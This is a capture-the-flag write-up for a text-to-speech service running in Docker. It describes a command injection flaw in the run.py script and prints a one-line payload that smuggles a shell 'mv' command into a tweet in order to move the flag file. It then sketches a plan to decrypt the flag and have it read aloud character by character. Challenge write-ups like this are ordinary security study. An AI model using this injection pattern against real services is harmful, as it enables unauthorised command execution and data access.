Writeup

The server executes a text-to-speech software on 4 user-provided tweets and lets you listen to the wav output files.
The text-to-speech process is executed in a docker image called lumjjb/echo_container
Inside the docker container, the file run.py performs the text-to-speech (TTS).
The tweets are written to a file input. The server saves the flag file, which contains the encrypted flag, in the same folder.
This folder is then shared with the docker TTS container.

In line 30 of run.py file there is a command execution vulnerability through the variable l

We can move the flag file to a wav file in the out folder with this payload";mv /share/flag "/share/out/1.wav.
After the TTS step, the wav files are converted with ffmpeg and the conversion output is stored in the folder served by the webserver.
Unfortunately when the flag file (txt) is moved to a wav, ffmpeg returns an error and no file is stored as output.

So we thought it would be nice to read the flag file directly with the TTS, but the server returned a 500 error.
The flag file has lots of unpronounceable characters, and it is 2470000 chars long, 65000 for every character in the flag, so the flag is actually 38 chars long.

So can write a small payload that decrypts the flag on the docker, let the server process the flag as TTS, convert the wav and then we would listen to the flag.
Since the TTS wasn’t good we splitted the flag text into single char converted to decimal.